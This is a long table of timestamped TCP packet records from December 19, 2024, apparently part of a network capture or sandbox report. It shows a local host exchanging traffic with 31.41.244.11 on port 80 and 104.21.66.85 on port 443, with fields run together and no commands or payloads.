                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.302038908 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.302815914 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.302918911 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.302951097 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.302966118 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.303987980 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.304045916 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.304086924 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.304131031 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.305073023 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.305107117 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.305155993 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.306157112 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.306201935 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.306339025 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.306407928 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.307331085 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.307384014 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.307408094 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.307447910 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.308350086 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.308458090 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.308506012 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.309463024 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.309508085 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.309603930 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.309647083 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.310646057 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.310689926 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.310818911 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.310878038 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.311738014 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.311794043 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.311871052 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.311990023 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.312802076 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.312913895 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.313004017 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.313055992 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.313926935 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.313972950 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.314023972 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.314179897 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.315021038 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.315066099 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.315099955 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.315140963 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.316157103 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.316209078 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.316241026 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.316282034 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.317226887 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.317271948 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.317363977 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.317404985 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.318350077 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.318506956 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.318559885 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.319433928 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.319540977 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.319561005 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.319602966 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.320594072 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.320657969 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.320688009 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.320703030 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.321643114 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.321789026 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.321831942 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.322760105 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.322810888 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.322949886 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.323009968 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.323920012 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.323991060 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.324031115 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.324130058 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.324989080 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.325035095 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.325109959 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.325151920 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.326148987 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.326195002 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.326229095 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.327223063 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.327270985 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.327353001 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.328325033 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.328371048 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.328448057 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.328499079 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.329408884 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.329519987 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.329571009 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.330589056 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.330651045 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.330665112 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.330720901 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.331614971 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.331662893 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.331708908 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.331765890 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.332746029 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.332792997 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.332878113 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.332918882 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.333841085 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.333954096 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.334002018 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.335033894 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.335083008 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.335115910 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.335724115 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.336146116 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.336173058 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.336201906 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.336215973 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.337184906 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.337266922 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.337311983 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.338282108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.338399887 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.338452101 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.339404106 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.339457989 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.339492083 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.339541912 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.340503931 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.340552092 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.340720892 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.340805054 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.341707945 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.341747999 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.341752052 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.341969967 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.342804909 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.342822075 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.342864037 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.342864037 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.343827009 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.343879938 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.343961954 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.344398022 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.344944954 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.345004082 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.345138073 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.345180988 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.346052885 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.346142054 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.346182108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.346223116 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.347165108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.347224951 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.347259998 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.347327948 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.348247051 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.348294973 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.348360062 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.348705053 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.349353075 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.349400043 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.349463940 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.349503040 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.350455046 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.350534916 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.350579023 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.351578951 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.351675987 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.351706982 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.351768017 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.352693081 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.352744102 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.352787971 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.352838039 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.353800058 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.353848934 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.353914976 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.353956938 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.354912043 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.354959011 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.354999065 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.355040073 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.356012106 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.356054068 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.356117964 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.356223106 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.357120037 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.357177019 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.357218027 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.358118057 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.358249903 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.358345985 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.358413935 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.359292030 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.359344959 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.424580097 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.424746037 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.424797058 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.424812078 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.424912930 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.425005913 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.425085068 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.425092936 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.425132990 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.425139904 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.433490992 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.433551073 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.433559895 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.441836119 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.441939116 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.441991091 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.441999912 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.442054033 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.493283033 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.493387938 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.493421078 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.493438005 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.493840933 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.493896008 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.493935108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.493983984 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.494946003 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.495002031 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.495060921 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.495131969 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.496085882 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.496150970 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.496198893 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.497162104 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.497205973 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.497328997 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.497380018 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.498296022 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.498311043 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.498339891 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.498364925 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.499356985 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.499424934 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.499464989 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.499506950 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.500469923 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.500571012 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.500603914 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.500655890 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.501626015 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.501709938 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.501740932 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.501754045 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.502721071 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.502785921 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.502818108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.502921104 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.503839970 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.503855944 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.503917933 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.503917933 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.504900932 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.504957914 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.504997015 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.505042076 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.506050110 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.506066084 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.506114006 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.506114006 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.507127047 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.507244110 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.507282019 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.508240938 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.508343935 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.508394003 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.509362936 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.509404898 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.509443998 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.509480000 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.510457993 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.510498047 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.510603905 CET804989231.41.244.11192.168.2.4
